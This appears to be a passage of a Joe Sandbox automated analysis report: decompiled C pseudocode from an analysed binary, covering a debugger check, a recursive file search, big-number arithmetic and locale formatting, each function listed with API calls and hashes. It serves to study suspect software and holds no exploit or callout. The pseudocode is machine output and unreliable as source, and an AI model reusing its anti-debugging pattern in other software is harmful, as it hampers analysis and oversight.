                				_v800 = _a12;
                				_v792 = _v0;
                				_t67 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(0);
                				_t36 =  &_v812; // -805
                				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                					_push(_a4);
                					_t57 = E003EFA46(_t57);
                				}
                				return E003EFBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                			}

                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003F8FB5
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003F8FBF
                • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 003F8FCC
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 2436f1df35d1efc802aa8f8f3a09d04622294db6b2de0ffe05060e8ffed41e0b
                • Instruction ID: d02378278beff916dfda85715e755bea018440d09ce2dfc13d372d5ad1fd08f7
                • Opcode Fuzzy Hash: 2436f1df35d1efc802aa8f8f3a09d04622294db6b2de0ffe05060e8ffed41e0b
                • Instruction Fuzzy Hash: 7A31D87591122C9BCB21DF25DD8879CBBB8AF08310F5042EAE41CAB290EB749F818F44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E003FB348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				intOrPtr* _v32;
                				CHAR* _v36;
                				signed int _v48;
                				char _v286;
                				signed int _v287;
                				struct _WIN32_FIND_DATAA _v332;
                				intOrPtr* _v336;
                				signed int _v340;
                				signed int _v344;
                				intOrPtr _v372;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				signed int _t40;
                				signed int _t43;
                				intOrPtr _t45;
                				signed char _t47;
                				intOrPtr* _t55;
                				union _FINDEX_INFO_LEVELS _t57;
                				union _FINDEX_INFO_LEVELS _t58;
                				signed int _t62;
                				signed int _t65;
                				void* _t71;
                				void* _t73;
                				signed int _t74;
                				void* _t77;
                				CHAR* _t78;
                				void* _t79;
                				intOrPtr* _t82;
                				intOrPtr _t84;
                				void* _t86;
                				intOrPtr* _t87;
                				signed int _t91;
                				signed int _t95;
                				void* _t100;
                				signed int _t103;
                				union _FINDEX_INFO_LEVELS _t104;
                				void* _t105;
                				void* _t108;
                				void* _t109;
                				intOrPtr _t110;
                				void* _t111;
                				void* _t112;
                				signed int _t116;
                				void* _t117;
                				signed int _t118;
                				void* _t119;
                				void* _t120;
                
                				_push(__ecx);
                				_t82 = _a4;
                				_t2 = _t82 + 1; // 0x1
                				_t100 = _t2;
                				do {
                					_t35 =  *_t82;
                					_t82 = _t82 + 1;
                				} while (_t35 != 0);
                				_t103 = _a12;
                				_t84 = _t82 - _t100 + 1;
                				_v8 = _t84;
                				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
                					_t5 = _t103 + 1; // 0x1
                					_t77 = _t5 + _t84;
                					_t109 = E003FB136(_t84, _t77, 1);
                					_t86 = _t108;
                					__eflags = _t103;
                					if(_t103 == 0) {
                						L6:
                						_push(_v8);
                						_t77 = _t77 - _t103;
                						_t40 = E003FF101(_t86, _t109 + _t103, _t77, _a4);
                						_t118 = _t117 + 0x10;
                						__eflags = _t40;
                						if(__eflags != 0) {
                							goto L9;
                						} else {
                							_t71 = E003FB587(_a16, _t100, __eflags, _t109);
                							E003F8DCC(0);
                							_t73 = _t71;
                							goto L8;
                						}
                					} else {
                						_push(_t103);
                						_t74 = E003FF101(_t86, _t109, _t77, _a8);
                						_t118 = _t117 + 0x10;
                						__eflags = _t74;
                						if(_t74 != 0) {
                							L9:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E003F9097();
                							asm("int3");
                							_t116 = _t118;
                							_t119 = _t118 - 0x150;
                							_t43 =  *0x40e7ac; // 0xc24f6281
                							_v48 = _t43 ^ _t116;
                							_t87 = _v32;
                							_push(_t77);
                							_t78 = _v36;
                							_push(_t109);
                							_t110 = _v332.cAlternateFileName;
                							_push(_t103);
                							_v372 = _t110;
                							while(1) {
                								__eflags = _t87 - _t78;
                								if(_t87 == _t78) {
                									break;
                								}
                								_t45 =  *_t87;
                								__eflags = _t45 - 0x2f;
                								if(_t45 != 0x2f) {
                									__eflags = _t45 - 0x5c;
                									if(_t45 != 0x5c) {
                										__eflags = _t45 - 0x3a;
                										if(_t45 != 0x3a) {
                											_t87 = E003FF150(_t78, _t87);
                											continue;
                										}
                									}
                								}
                								break;
                							}
                							_t101 =  *_t87;
                							__eflags = _t101 - 0x3a;
                							if(_t101 != 0x3a) {
                								L19:
                								_t104 = 0;
                								__eflags = _t101 - 0x2f;
                								if(_t101 == 0x2f) {
                									L23:
                									_t47 = 1;
                									__eflags = 1;
                								} else {
                									__eflags = _t101 - 0x5c;
                									if(_t101 == 0x5c) {
                										goto L23;
                									} else {
                										__eflags = _t101 - 0x3a;
                										if(_t101 == 0x3a) {
                											goto L23;
                										} else {
                											_t47 = 0;
                										}
                									}
                								}
                								_t89 = _t87 - _t78 + 1;
                								asm("sbb eax, eax");
                								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                								E003EFFF0(_t104,  &_v332, _t104, 0x140);
                								_t120 = _t119 + 0xc;
                								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
                								_t55 = _v336;
                								__eflags = _t111 - 0xffffffff;
                								if(_t111 != 0xffffffff) {
                									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                									__eflags = _t91;
                									_t92 = _t91 >> 2;
                									_v344 = _t91 >> 2;
                									do {
                										__eflags = _v332.cFileName - 0x2e;
                										if(_v332.cFileName != 0x2e) {
                											L36:
                											_push(_t55);
                											_t57 = E003FB348(_t92,  &(_v332.cFileName), _t78, _v340);
                											_t120 = _t120 + 0x10;
                											__eflags = _t57;
                											if(_t57 != 0) {
                												goto L26;
                											} else {
                												goto L37;
                											}
                										} else {
                											_t92 = _v287;
                											__eflags = _t92;
                											if(_t92 == 0) {
                												goto L37;
                											} else {
                												__eflags = _t92 - 0x2e;
                												if(_t92 != 0x2e) {
                													goto L36;
                												} else {
                													__eflags = _v286;
                													if(_v286 == 0) {
                														goto L37;
                													} else {
                														goto L36;
                													}
                												}
                											}
                										}
                										goto L40;
                										L37:
                										_t62 = FindNextFileA(_t111,  &_v332);
                										__eflags = _t62;
                										_t55 = _v336;
                									} while (_t62 != 0);
                									_t101 =  *_t55;
                									_t95 = _v344;
                									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                									__eflags = _t95 - _t65;
                									if(_t95 != _t65) {
                										E003F6310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E003FB1A0);
                									}
                								} else {
                									_push(_t55);
                									_t57 = E003FB348(_t89, _t78, _t104, _t104);
                									L26:
                									_t104 = _t57;
                								}
                								__eflags = _t111 - 0xffffffff;
                								if(_t111 != 0xffffffff) {
                									FindClose(_t111);
                								}
                								_t58 = _t104;
                							} else {
                								__eflags = _t87 -  &(_t78[1]);
                								if(_t87 ==  &(_t78[1])) {
                									goto L19;
                								} else {
                									_push(_t110);
                									_t58 = E003FB348(_t87, _t78, 0, 0);
                								}
                							}
                							_pop(_t105);
                							_pop(_t112);
                							__eflags = _v12 ^ _t116;
                							_pop(_t79);
                							return E003EFBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
                						} else {
                							goto L6;
                						}
                					}
                				} else {
                					_t73 = 0xc;
                					L8:
                					return _t73;
                				}
                				L40:
                			}
                0x00000000
                0x00000000
                0x003fb39a
                0x003fb36e
                0x003fb370
                0x003fb3cc
                0x003fb3d0
                0x003fb3d0
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 96551e5f66f283c81a2bfcd9bfaf0a96bc07bb2d7e23eb3d86b7c2f5ec8ec8da
                • Instruction ID: c96008e95d1b9a699da0329c90c9992b3910ba89d39f260318a26139b4f44be5
                • Opcode Fuzzy Hash: 96551e5f66f283c81a2bfcd9bfaf0a96bc07bb2d7e23eb3d86b7c2f5ec8ec8da
                • Instruction Fuzzy Hash: 883105B190024DAFCB269E79CC84EFBBBBDDB85304F1501A9FA1897252E7309E458B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003FD440(signed int* _a4, signed int* _a8) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int* _v80;
                				char _v540;
                				signed int _v544;
                				signed int _t197;
                				signed int _t198;
                				signed int* _t200;
                				signed int _t201;
                				signed int _t204;
                				signed int _t206;
                				signed int _t208;
                				signed int _t209;
                				signed int _t213;
                				signed int _t219;
                				intOrPtr _t225;
                				void* _t228;
                				signed int _t230;
                				signed int _t247;
                				signed int _t250;
                				void* _t253;
                				signed int _t256;
                				signed int* _t262;
                				signed int _t263;
                				signed int _t264;
                				void* _t265;
                				intOrPtr* _t266;
                				signed int _t267;
                				signed int _t269;
                				signed int _t270;
                				signed int _t271;
                				signed int _t272;
                				signed int* _t274;
                				signed int* _t278;
                				signed int _t279;
                				signed int _t280;
                				intOrPtr _t282;
                				void* _t286;
                				signed char _t292;
                				signed int _t295;
                				signed int _t303;
                				signed int _t306;
                				signed int _t307;
                				signed int _t309;
                				signed int _t311;
                				signed int _t313;
                				intOrPtr* _t314;
                				signed int _t318;
                				signed int _t322;
                				signed int* _t328;
                				signed int _t330;
                				signed int _t331;
                				signed int _t333;
                				void* _t334;
                				signed int _t336;
                				signed int _t338;
                				signed int _t341;
                				signed int _t342;
                				signed int* _t344;
                				signed int _t349;
                				signed int _t351;
                				void* _t355;
                				signed int _t359;
                				signed int _t360;
                				signed int _t362;
                				signed int* _t368;
                				signed int* _t369;
                				signed int* _t370;
                				signed int* _t373;
                
                				_t262 = _a4;
                				_t197 =  *_t262;
                				if(_t197 != 0) {
                					_t328 = _a8;
                					_t267 =  *_t328;
                					__eflags = _t267;
                					if(_t267 != 0) {
                						_t3 = _t197 - 1; // -1
                						_t349 = _t3;
                						_t4 = _t267 - 1; // -1
                						_t198 = _t4;
                						_v16 = _t349;
                						__eflags = _t198;
                						if(_t198 != 0) {
                							__eflags = _t198 - _t349;
                							if(_t198 > _t349) {
                								L23:
                								__eflags = 0;
                								return 0;
                							} else {
                								_t46 = _t198 + 1; // 0x0
                								_t306 = _t349 - _t198;
                								_v60 = _t46;
                								_t269 = _t349;
                								__eflags = _t349 - _t306;
                								if(_t349 < _t306) {
                									L21:
                									_t306 = _t306 + 1;
                									__eflags = _t306;
                								} else {
                									_t368 =  &(_t262[_t349 + 1]);
                									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                									__eflags = _t341;
                									while(1) {
                										__eflags =  *_t341 -  *_t368;
                										if( *_t341 !=  *_t368) {
                											break;
                										}
                										_t269 = _t269 - 1;
                										_t341 = _t341 - 4;
                										_t368 = _t368 - 4;
                										__eflags = _t269 - _t306;
                										if(_t269 >= _t306) {
                											continue;
                										} else {
                											goto L21;
                										}
                										goto L22;
                									}
                									_t369 = _a8;
                									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                										goto L21;
                									}
                								}
                								L22:
                								__eflags = _t306;
                								if(__eflags != 0) {
                									_t330 = _v60;
                									_t200 = _a8;
                									_t351 =  *(_t200 + _t330 * 4);
                									_t64 = _t330 * 4; // 0xffffe9e5
                									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                									_v36 = _t201;
                									asm("bsr eax, esi");
                									_v56 = _t351;
                									if(__eflags == 0) {
                										_t270 = 0x20;
                									} else {
                										_t270 = 0x1f - _t201;
                									}
                									_v40 = _t270;
                									_v64 = 0x20 - _t270;
                									__eflags = _t270;
                									if(_t270 != 0) {
                										_t292 = _v40;
                										_v36 = _v36 << _t292;
                										_v56 = _t351 << _t292 | _v36 >> _v64;
                										__eflags = _t330 - 2;
                										if(_t330 > 2) {
                											_t79 = _t330 * 4; // 0xe850ffff
                											_t81 =  &_v36;
                											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                											__eflags =  *_t81;
                										}
                									}
                									_v76 = 0;
                									_t307 = _t306 + 0xffffffff;
                									__eflags = _t307;
                									_v32 = _t307;
                									if(_t307 < 0) {
                										_t331 = 0;
                										__eflags = 0;
                									} else {
                										_t85 =  &(_t262[1]); // 0x4
                										_v20 =  &(_t85[_t307]);
                										_t206 = _t307 + _t330;
                										_t90 = _t262 - 4; // -4
                										_v12 = _t206;
                										_t278 = _t90 + _t206 * 4;
                										_v80 = _t278;
                										do {
                											__eflags = _t206 - _v16;
                											if(_t206 > _v16) {
                												_t207 = 0;
                												__eflags = 0;
                											} else {
                												_t207 = _t278[2];
                											}
                											__eflags = _v40;
                											_t311 = _t278[1];
                											_t279 =  *_t278;
                											_v52 = _t207;
                											_v44 = 0;
                											_v8 = _t207;
                											_v24 = _t279;
                											if(_v40 > 0) {
                												_t318 = _v8;
                												_t336 = _t279 >> _v64;
                												_t230 = E003EF0C0(_t311, _v40, _t318);
                												_t279 = _v40;
                												_t207 = _t318;
                												_t311 = _t336 | _t230;
                												_t359 = _v24 << _t279;
                												__eflags = _v12 - 3;
                												_v8 = _t318;
                												_v24 = _t359;
                												if(_v12 >= 3) {
                													_t279 = _v64;
                													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                													__eflags = _t360;
                													_t207 = _v8;
                													_v24 = _t360;
                												}
                											}
                											_t208 = E004021C0(_t311, _t207, _v56, 0);
                											_v44 = _t262;
                											_t263 = _t208;
                											_v44 = 0;
                											_t209 = _t311;
                											_v8 = _t263;
                											_v28 = _t209;
                											_t333 = _t279;
                											_v72 = _t263;
                											_v68 = _t209;
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L40:
                												_t264 = _t263 + 1;
                												asm("adc eax, 0xffffffff");
                												_t333 = _t333 + E003EF0E0(_t264, _t209, _v56, 0);
                												asm("adc esi, edx");
                												_t263 = _t264 | 0xffffffff;
                												_t209 = 0;
                												__eflags = 0;
                												_v44 = 0;
                												_v8 = _t263;
                												_v72 = _t263;
                												_v28 = 0;
                												_v68 = 0;
                											} else {
                												__eflags = _t263 - 0xffffffff;
                												if(_t263 > 0xffffffff) {
                													goto L40;
                												}
                											}
                											__eflags = 0;
                											if(0 <= 0) {
                												if(0 < 0) {
                													goto L44;
                												} else {
                													__eflags = _t333 - 0xffffffff;
                													if(_t333 <= 0xffffffff) {
                														while(1) {
                															L44:
                															_v8 = _v24;
                															_t228 = E003EF0E0(_v36, 0, _t263, _t209);
                															__eflags = _t311 - _t333;
                															if(__eflags < 0) {
                																break;
                															}
                															if(__eflags > 0) {
                																L47:
                																_t209 = _v28;
                																_t263 = _t263 + 0xffffffff;
                																_v72 = _t263;
                																asm("adc eax, 0xffffffff");
                																_t333 = _t333 + _v56;
                																__eflags = _t333;
                																_v28 = _t209;
                																asm("adc dword [ebp-0x28], 0x0");
                																_v68 = _t209;
                																if(_t333 == 0) {
                																	__eflags = _t333 - 0xffffffff;
                																	if(_t333 <= 0xffffffff) {
                																		continue;
                																	} else {
                																	}
                																}
                															} else {
                																__eflags = _t228 - _v8;
                																if(_t228 <= _v8) {
                																	break;
                																} else {
                																	goto L47;
                																}
                															}
                															L51:
                															_v8 = _t263;
                															goto L52;
                														}
                														_t209 = _v28;
                														goto L51;
                													}
                												}
                											}
                											L52:
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L54:
                												_t280 = _v60;
                												_t334 = 0;
                												_t355 = 0;
                												__eflags = _t280;
                												if(_t280 != 0) {
                													_t266 = _v20;
                													_t219 =  &(_a8[1]);
                													__eflags = _t219;
                													_v24 = _t219;
                													_v16 = _t280;
                													do {
                														_v44 =  *_t219;
                														_t225 =  *_t266;
                														_t286 = _t334 + _v72 * _v44;
                														asm("adc esi, edx");
                														_t334 = _t355;
                														_t355 = 0;
                														__eflags = _t225 - _t286;
                														if(_t225 < _t286) {
                															_t334 = _t334 + 1;
                															asm("adc esi, esi");
                														}
                														 *_t266 = _t225 - _t286;
                														_t266 = _t266 + 4;
                														_t219 = _v24 + 4;
                														_t164 =  &_v16;
                														 *_t164 = _v16 - 1;
                														__eflags =  *_t164;
                														_v24 = _t219;
                													} while ( *_t164 != 0);
                													_t263 = _v8;
                													_t280 = _v60;
                												}
                												__eflags = 0 - _t355;
                												if(__eflags <= 0) {
                													if(__eflags < 0) {
                														L63:
                														__eflags = _t280;
                														if(_t280 != 0) {
                															_t338 = _t280;
                															_t314 = _v20;
                															_t362 =  &(_a8[1]);
                															__eflags = _t362;
                															_t265 = 0;
                															do {
                																_t282 =  *_t314;
                																_t172 = _t362 + 4; // 0xa6a5959
                																_t362 = _t172;
                																_t314 = _t314 + 4;
                																asm("adc eax, eax");
                																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                																asm("adc eax, 0x0");
                																_t265 = 0;
                																_t338 = _t338 - 1;
                																__eflags = _t338;
                															} while (_t338 != 0);
                															_t263 = _v8;
                														}
                														_t263 = _t263 + 0xffffffff;
                														asm("adc dword [ebp-0x18], 0xffffffff");
                													} else {
                														__eflags = _v52 - _t334;
                														if(_v52 < _t334) {
                															goto L63;
                														}
                													}
                												}
                												_t213 = _v12 - 1;
                												__eflags = _t213;
                												_v16 = _t213;
                											} else {
                												__eflags = _t263;
                												if(_t263 != 0) {
                													goto L54;
                												}
                											}
                											_t331 = 0 + _t263;
                											asm("adc esi, 0x0");
                											_v20 = _v20 - 4;
                											_t313 = _v32 - 1;
                											_t262 = _a4;
                											_t278 = _v80 - 4;
                											_t206 = _v12 - 1;
                											_v76 = _t331;
                											_v32 = _t313;
                											_v80 = _t278;
                											_v12 = _t206;
                											__eflags = _t313;
                										} while (_t313 >= 0);
                									}
                									_t309 = _v16 + 1;
                									_t204 = _t309;
                									__eflags = _t204 -  *_t262;
                									if(_t204 <  *_t262) {
                										_t191 = _t204 + 1; // 0x3fea5d
                										_t274 =  &(_t262[_t191]);
                										do {
                											 *_t274 = 0;
                											_t194 =  &(_t274[1]); // 0x91850fc2
                											_t274 = _t194;
                											_t204 = _t204 + 1;
                											__eflags = _t204 -  *_t262;
                										} while (_t204 <  *_t262);
                									}
                									 *_t262 = _t309;
                									__eflags = _t309;
                									if(_t309 != 0) {
                										while(1) {
                											_t271 =  *_t262;
                											__eflags = _t262[_t271];
                											if(_t262[_t271] != 0) {
                												goto L78;
                											}
                											_t272 = _t271 + 0xffffffff;
                											__eflags = _t272;
                											 *_t262 = _t272;
                											if(_t272 != 0) {
                												continue;
                											}
                											goto L78;
                										}
                									}
                									L78:
                									return _t331;
                								} else {
                									goto L23;
                								}
                							}
                						} else {
                							_t6 =  &(_t328[1]); // 0xfc23b5a
                							_t295 =  *_t6;
                							_v44 = _t295;
                							__eflags = _t295 - 1;
                							if(_t295 != 1) {
                								__eflags = _t349;
                								if(_t349 != 0) {
                									_t342 = 0;
                									_v12 = 0;
                									_v8 = 0;
                									_v20 = 0;
                									__eflags = _t349 - 0xffffffff;
                									if(_t349 != 0xffffffff) {
                										_t250 = _v16 + 1;
                										__eflags = _t250;
                										_v32 = _t250;
                										_t373 =  &(_t262[_t349 + 1]);
                										do {
                											_t253 = E004021C0( *_t373, _t342, _t295, 0);
                											_v68 = _t303;
                											_t373 = _t373 - 4;
                											_v20 = _t262;
                											_t342 = _t295;
                											_t303 = 0 + _t253;
                											asm("adc ecx, 0x0");
                											_v12 = _t303;
                											_t34 =  &_v32;
                											 *_t34 = _v32 - 1;
                											__eflags =  *_t34;
                											_v8 = _v12;
                											_t295 = _v44;
                										} while ( *_t34 != 0);
                										_t262 = _a4;
                									}
                									_v544 = 0;
                									_t41 =  &(_t262[1]); // 0x4
                									_t370 = _t41;
                									 *_t262 = 0;
                									E003FBDE1(_t370, 0x1cc,  &_v540, 0);
                									_t247 = _v20;
                									__eflags = 0 - _t247;
                									 *_t370 = _t342;
                									_t262[2] = _t247;
                									asm("sbb ecx, ecx");
                									__eflags =  ~0x00000000;
                									 *_t262 = 0xbadbae;
                									return _v12;
                								} else {
                									_t14 =  &(_t262[1]); // 0x4
                									_t344 = _t14;
                									_v544 = 0;
                									 *_t262 = 0;
                									E003FBDE1(_t344, 0x1cc,  &_v540, 0);
                									_t256 = _t262[1];
                									_t322 = _t256 % _v44;
                									__eflags = 0 - _t322;
                									 *_t344 = _t322;
                									asm("sbb ecx, ecx");
                									__eflags = 0;
                									 *_t262 =  ~0x00000000;
                									return _t256 / _v44;
                								}
                							} else {
                								_t9 =  &(_t262[1]); // 0x4
                								_v544 = _t198;
                								 *_t262 = _t198;
                								E003FBDE1(_t9, 0x1cc,  &_v540, _t198);
                								__eflags = 0;
                								return _t262[1];
                							}
                						}
                					} else {
                						__eflags = 0;
                						return 0;
                					}
                				} else {
                					return _t197;
                				}
                			}

                0x003fd881
                0x003fd884
                0x003fd888
                0x003fd889
                0x003fd88c
                0x003fd88f
                0x003fd890
                0x003fd893
                0x003fd896
                0x003fd899
                0x003fd89c
                0x003fd89c
                0x003fd8a4
                0x003fd8ab
                0x003fd8ac
                0x003fd8ae
                0x003fd8b0
                0x003fd8b2
                0x003fd8b5
                0x003fd8c0
                0x003fd8c0
                0x003fd8c6
                0x003fd8c6
                0x003fd8c9
                0x003fd8ca
                0x003fd8ca
                0x003fd8c0
                0x003fd8ce
                0x003fd8d0
                0x003fd8d2
                0x003fd8d4
                0x003fd8d4
                0x003fd8d6
                0x003fd8da
                0x00000000
                0x00000000
                0x003fd8dc
                0x003fd8dc
                0x003fd8df
                0x003fd8e1
                0x00000000
                0x00000000
                0x00000000
                0x003fd8e1
                0x003fd8d4
                0x003fd8e3
                0x003fd8ed
                0x00000000
                0x00000000
                0x00000000
                0x003fd5f8
                0x003fd482
                0x003fd482
                0x003fd482
                0x003fd485
                0x003fd488
                0x003fd48b
                0x003fd4bc
                0x003fd4be
                0x003fd509
                0x003fd50b
                0x003fd512
                0x003fd519
                0x003fd51c
                0x003fd51f
                0x003fd525
                0x003fd525
                0x003fd526
                0x003fd529
                0x003fd530
                0x003fd539
                0x003fd53e
                0x003fd541
                0x003fd546
                0x003fd549
                0x003fd54b
                0x003fd550
                0x003fd553
                0x003fd556
                0x003fd556
                0x003fd556
                0x003fd55a
                0x003fd55d
                0x003fd55d
                0x003fd562
                0x003fd562
                0x003fd56d
                0x003fd578
                0x003fd578
                0x003fd57b
                0x003fd587
                0x003fd58c
                0x003fd597
                0x003fd599
                0x003fd59b
                0x003fd5a1
                0x003fd5a6
                0x003fd5a8
                0x003fd5ae
                0x003fd4c0
                0x003fd4cc
                0x003fd4cc
                0x003fd4cf
                0x003fd4df
                0x003fd4e5
                0x003fd4ec
                0x003fd4ee
                0x003fd4f6
                0x003fd4f8
                0x003fd4fa
                0x003fd4ff
                0x003fd502
                0x003fd508
                0x003fd508
                0x003fd48d
                0x003fd490
                0x003fd494
                0x003fd49a
                0x003fd4a9
                0x003fd4b3
                0x003fd4bb
                0x003fd4bb
                0x003fd48b
                0x003fd466
                0x003fd469
                0x003fd46f
                0x003fd46f
                0x003fd455
                0x003fd45b
                0x003fd45b

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                • Instruction ID: e722e6d3094be1145e4c39d300d5fa0e81cf88d0313794f5921fb542c9e3eeb4
                • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                • Instruction Fuzzy Hash: 83022C71E002199FDF15DFA9C8846ADF7F2EF88314F258269D919EB384D731AE458B80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EAF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
                				short _v104;
                				short _v304;
                				short* _t23;
                				int _t24;
                
                				if( *0x40e73c == 0) {
                					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
                					 *0x42fcb0 = _v304;
                					 *0x42fcb2 = 0;
                					 *0x40e73c = 0x42fcb0;
                				}
                				E003E04BD(_a4, _a8,  &_v104, 0x32);
                				_t23 = _a12;
                				_t24 = _a16;
                				 *_t23 = 0;
                				GetNumberFormatW(0x400, 0,  &_v104, 0x40e72c, _t23, _t24);
                				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
                				return 0;
                			}







                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003EAF35
                • GetNumberFormatW.KERNEL32 ref: 003EAF84
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: 5756a6600c3009a1f13d9810682d7de8450ec2aec8e97a52afbbfb9a46044ac9
                • Instruction ID: b6af697ccf6476bbea2e8865fcfa34fa5752db76866ddd515871846763921fb0
                • Opcode Fuzzy Hash: 5756a6600c3009a1f13d9810682d7de8450ec2aec8e97a52afbbfb9a46044ac9
                • Instruction Fuzzy Hash: 7C01713A210358AAD7119F76ED45F9A77BCFF08710F404432FA05A7190D370A929CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003D6C74(WCHAR* _a4, long _a8) {
                				long _t5;
                
                				_t5 = GetLastError();
                				if(_t5 == 0) {
                					return 0;
                				}
                				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
                			}




                APIs
                • GetLastError.KERNEL32(003D6DDF,00000000,00000400), ref: 003D6C74
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 003D6C95
                Memory Dump Source
